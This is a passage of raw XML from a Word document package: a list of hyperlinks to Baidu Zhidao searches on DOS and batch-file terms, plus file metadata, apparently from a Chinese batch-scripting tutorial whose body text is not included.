Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=config.sys&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E6%89%B9%E5%A4%84%E7%90%86%E6%96%87%E4%BB%B6&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E5%8F%8C%E5%BC%95%E5%8F%B7&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E9%87%8D%E5%A4%8D%E6%80%A7&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E5%8F%A5%E6%9F%84&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=hello%20world&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E4%BC%98%E5%85%88%E7%BA%A7&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E5%A2%9E%E9%87%8F&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=net%20use&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E8%82%89%E9%B8%A1&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E4%BA%8E%E8%BF%9E&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E5%8F%A5%E6%9F%84&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E8%BF%90%E8%A1%8C%E5%91%BD%E4%BB%A4&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E9%80%9A%E9%85%8D%E7%AC%A6&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E5%88%86%E5%8F%B7&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E9%87%8D%E5%AE%9A%E5%90%91&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=DOS%E5%91%BD%E4%BB%A4&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E5%86%85%E5%BE%AA%E7%8E%AF&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E5%8D%95%E5%BC%95%E5%8F%B7&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E5%90%8E%E9%97%A8%E7%A8%8B%E5%BA%8F&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E5%8F%A5%E6%9F%84&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E6%89%B9%E5%A4%84%E7%90%86%E6%96%87%E4%BB%B6&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E8%BF%90%E8%A1%8C%E5%91%BD%E4%BB%A4&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E6%89%B9%E5%A4%84%E7%90%86%E6%96%87%E4%BB%B6&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E5%8F%8C%E5%BC%95%E5%8F%B7&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E5%8F%8C%E5%BC%95%E5%8F%B7&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E9%9B%8F%E5%BD%A2&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E9%87%8D%E5%AE%9A%E5%90%91&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E9%81%93%E7%AC%A6&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E6%8D%89%E8%BF%B7%E8%97%8F&amp;fr=qb_search_exp&amp;ie=utf8"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2564</Words>
  <Characters>14616</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>121</Lines>
  <Paragraphs>34</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>17146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2017-07-06T03:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>